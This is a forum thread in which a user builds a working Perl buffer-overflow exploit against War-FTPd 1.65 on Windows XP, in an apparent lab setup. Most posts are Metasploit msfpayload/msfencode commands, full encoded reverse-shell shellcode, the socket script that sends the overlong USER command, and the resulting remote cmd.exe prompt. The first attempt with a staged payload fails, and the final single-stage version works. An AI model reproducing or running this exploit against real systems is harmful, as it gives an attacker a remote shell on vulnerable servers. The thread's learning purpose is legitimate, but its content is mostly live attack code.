.

question about building a perl exploit using metasploit

<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Thu Jul 10, 2008 12:30 am

question about building a perl exploit using metasploit

I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue.  Hopefully someone can tell me where I went wrong in this process.

The exploit I wanted to demo warftpd 1.65 since theres a whole lot of stuff out there already on it.  Looking at the metasploit module :
exploit/windows/ftp/warftpd_165_user I find that
  Code:
'BadChars' => "\x00\x0a\x0d\x40",
'Ret'      => 0x71ab1d54  # for XP SP0


Now, using the msf tools, I generate the exploit code:
  Code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b  '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 205

"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";


and then I incorporate all of that into the perl exploit

  Code:
#!/usr/bin/perl
use IO::Socket;

my $sock = new IO::Socket::INET (
                PeerAddr => "192.168.50.128",
                PeerPort =>"21",
                Proto => "tcp",
                );
$trash = <$sock>;
$str = "USER " . "A"x485 ."\x54\x1d\xab\x71" . "\x41"x115 ;
$str .= "\x29\xc9\xb1\x2d\xda\xc5\xb8\x0b\xe6\x4f\x25\xd9\x74\x24" .
"\xf4\x5e\x31\x46\x15\x03\x46\x15\x83\xc6\x04\xe9\x13\xb3" .
"\x4f\x06\x9c\xa4\x69\x27\xdc\xca\xea\xe6\xf8\xbe\x96\x34" .
"\x74\xbc\x55\x3c\x8b\xd2\x2d\xeb\xab\x2d\xd8\x98\x98\xb7" .
"\x1d\x70\xd1\x07\x84\x20\xd3\x42\xba\x39\x16\xd6\x05\x4c" .
"\x60\x94\xe3\x97\x46\x6e\x0f\xac\xdd\xde\xeb\x33\x0b\x86" .
"\x78\x2f\x92\xcc\x30\x53\x25\x3a\xcd\x47\xbc\x35\xbe\xb3" .
"\xa2\x24\xc0\x5b\xeb\x7d\x5a\x10\x4f\xb2\x28\x66\x5c\x39" .
"\x5e\x7a\xf1\xb6\xf7\x8a\x57\xaf\x54\xec\x0f\x1c\x69\x98" .
"\xb8\x11\xbf\x07\x13\xb0\x06\xc5\xfb\xc3\xaf\xbc\xaf\x68" .
"\x03\xed\x0c\xdc\xe0\x42\x1a\x05\x80\xe5\xf3\xc2\x4f\xb2" .
"\x58\xb5\xf6\xdb\x80\xc6\xdf\x45\x86\x91\x8f\x76\x2e\x76" .
"\x27\x48\x67\x4b\x39\x2e\x10\xbd\x65\xc8\xb3\x34\x76\x7e" .
"\x24\x14\x2e\x18\xfd\xcd\xd5\x1b\x2b\xa1\x61\xef\x84\x11" .
"\xdd\xbc\x42\x2f\x21\x7a\x74\xa9\xa8";
print $sock $str . "\r\n";
$trash = <$sock>;
print $sock "pass test \r\n";


The exploit is lauched when I run it, my listener gets a connection back, however it doesn't appear that cmd.exe is ever spawned and as soon as I send anything on the connection back the application crashes.  When I do it from within metasploit it works great, so I feel comfortable that this is something that I'm doing wrong.

Thanks in advance for any insight.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Thu Jul 10, 2008 9:25 pm

Re: question about building a perl exploit using metasploit

I figured I'd post back my solution in case anyone was interested, or in case anyone finds this via google (I was suprised that when i searched for msfencode and 2008 after < 24 hrs this was like the 5th entry on google).  I'm not sure why I didn't think about it, but the multi stage payload was the problem.  When I switched to using a single staged payload, that fixed the problem. 

I punted and went and built the payload in executable form:
  Code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 x > exp.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 177
Options: exitfunc=process,lhost=192.168.50.129,lport=4444


But.. when I went to run exp.exe on the vulnerable machine.. it crashed, which is what brought me back to the single stage.  Anyway.. I got success with the windows/shell_reverse_tcp payload.

  Code:
~/metasploit$ ./msfpayload windows/shell_reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r |./msfencode  -s 414 -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 315

"\xd9\xe1\x33\xc9\xd9\x74\x24\xf4\xb1\x49\x5a\xbf\x33\x3a" .
"\x88\xc8\x31\x7a\x17\x83\xea\xfc\x03\x49\x29\x6a\x3d\x51" .
"\x27\x81\xf3\x41\x41\xaa\xf3\x6e\xd2\xde\x60\xb4\x37\x6a" .
"\x3d\x88\xbc\x10\xbb\x88\xc3\x07\x48\x27\xdc\x5c\x10\x97" .
"\xdd\x89\xe6\x5c\xe9\xc6\xf8\x8c\x23\x19\x63\xfc\xc0\x59" .
"\xe0\xfb\x09\x93\x04\x02\x48\xcf\xe3\x3f\x18\x34\x24\x4a" .
"\x45\xbf\x6b\x90\x84\x2b\xf5\x53\x8a\xe0\x71\x3c\x8f\xf7" .
"\x6e\xc1\x83\x7c\xf9\xa9\xff\x9e\x9b\xf2\x31\x44\x3f\x7f" .
"\x72\x4a\x4b\x3f\x79\x21\x3b\xa3\x2c\xbe\xfc\xd3\x70\xa9" .
"\x72\xad\x82\xc5\xdb\xce\x4d\x73\x8f\x56\x1a\x4f\x1d\xfe" .
"\xad\xdc\x53\xa1\x05\xdc\x44\x35\x6d\xcf\x99\xfe\x21\xef" .
"\xb4\x5f\x4b\xea\x5f\xde\xa6\xfd\x9d\xb5\x52\xfc\x5e\xe5" .
"\xcb\xd9\xa8\xf0\xa1\x8d\x55\x2c\xea\x62\xf9\x83\x4e\xd6" .
"\xbe\x70\xae\x08\x28\xb6\xf8\x9b\x28\x50\x91\xca\x76\xfa" .
"\x32\x64\x67\x97\xdd\x9a\x91\x3d\x7d\x34\x9d\x97\x14\xaa" .
"\x30\x42\x16\x1a\xd4\x06\x8c\xfd\x71\xb5\x21\x68\xd2\x60" .
"\x93\xa0\x5b\x75\x89\x7c\xd5\x9b\x7f\xbd\x16\xf1\x15\xb4" .
"\x24\xfb\x54\xea\x28\x41\x75\x79\xae\x7d\x2e\x2a\xe4\x15" .
"\x42\xd3\x48\xf3\x5d\x5e\x87\x04\x77\xfa\x80\xa8\x29\xac" .
"\x7f\x26\xcb\x1f\xd1\xe3\x9a\x60\x01\x63\xb0\x46\xa7\xbd" .
"\x99\x87\x7e\x2b\xe1\x87\x48\x54\xcd\x10\x50\xd3\x28\x99" .
"\x61\x56\xb1\xa5\x48\x67\xce\xa5\x8a\x47\x59\x28\xad\x85" .
"\xe9\x87\xb2\x9f\xf1\xf8\x47";


Which brought me back to final code which worked..
  Code:
#!/usr/bin/perl
use IO::Socket;

my $sock = new IO::Socket::INET (
                PeerAddr => "192.168.50.128",
                PeerPort =>"21",
                Proto => "tcp",
                );
$str = "USER " . "\x90"x485 ."\x54\x1d\xab\x71" . "\x90"x115 ;
$str .= "\xb8\x84\x3b\x15\xf2\xda\xdb\xd9\x74\x24\xf4\x31\xc9\xb1" .
"\x49\x5a\x83\xea\xfc\x31\x42\x0e\x03\xc6\x35\xf7\x07\x3a" .
"\x23\x1c\xaa\x2a\x4d\x1d\xca\x55\xce\x69\x59\x8d\x2b\xe5" .
"\xe7\xf1\xb8\x85\xe2\x71\xbe\x9a\x66\xce\xd8\xef\x26\xf0" .
"\xd9\x04\x91\x7b\xed\x51\x23\x95\x3f\xa6\xbd\xc5\xc4\xe6" .
"\xca\x12\x04\x2c\x3f\x1d\x44\x5a\xb4\x26\x1c\xb9\x1d\x2d" .
"\x79\x4a\x02\xe9\x80\xa6\xdb\x7a\x8e\x73\xaf\x23\x93\x82" .
"\x44\xd8\x87\x0f\x13\xb2\xf3\x13\x45\x89\xcd\xf0\xe1\x86" .
"\x6d\x37\x61\xd8\x7d\xbc\x05\xc4\xd0\x49\xa5\xfc\x74\x26" .
"\xa8\xb2\x86\x5a\xe4\xb5\x41\xc4\x56\x2f\x06\x3a\x6b\xc7" .
"\xa1\x4f\xb9\x48\x1a\x4f\x6d\x1e\x69\x42\x72\xe5\x3d\x62" .
"\x5d\x46\x37\x79\x04\xf9\xaa\x8a\xcb\xac\x5e\x89\x34\x9e" .
"\xf7\x54\xc3\xeb\xa5\x30\x2b\xc5\xe5\xed\x80\xba\x4a\x41" .
"\x64\x6f\xb2\xb5\x02\x4f\xe4\x04\x52\x29\x9d\x79\x08\xd3" .
"\x0e\xf3\x51\x8e\xd9\xef\x6b\x1a\x79\xa7\x74\x8c\x10\x57" .
"\xda\x65\x1a\x87\xba\xef\x80\x4e\x2b\x8c\x25\xe5\xfb\x0b" .
"\x9f\x35\x72\x4c\xb5\x81\x0c\x70\x7b\xca\xfc\xde\xe9\x43" .
"\xff\xe0\x50\x79\xfe\x5e\x79\x0c\x84\x66\x2a\xa5\xd2\xfe" .
"\x5e\x44\x97\xe8\x61\xcd\xf0\xeb\x48\x75\x56\x41\x24\xdb" .
"\x09\x0f\xc7\x8a\xf8\x9a\x96\xd3\x2b\x4c\xb4\xf5\xc9\x42" .
"\x95\xfa\x04\x30\xe5\xfa\x9e\x3b\xc9\x6d\x06\xba\x2c\x14" .
"\x37\x49\xb5\x18\x11\x4e\xc2\x1a\x61\x60\x45\x9d\x46\x62" .
"\xe5\x32\x88\xb4\xf5\x65\x7c";
print $sock $str . "\r\n";


and then.... tada!
  Code:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\War-ftpd>
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Thu Jul 10, 2008 10:05 pm

Re: question about building a perl exploit using metasploit

Nice work.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Thu Jul 10, 2008 10:35 pm

Re: question about building a perl exploit using metasploit

that makes sense since there was no payload handler in place
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Fri Jul 11, 2008 2:23 am

Re: question about building a perl exploit using metasploit

Nicely done Apollo

and thanks for posting the solution aswell as the problem.

Return to Malware

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software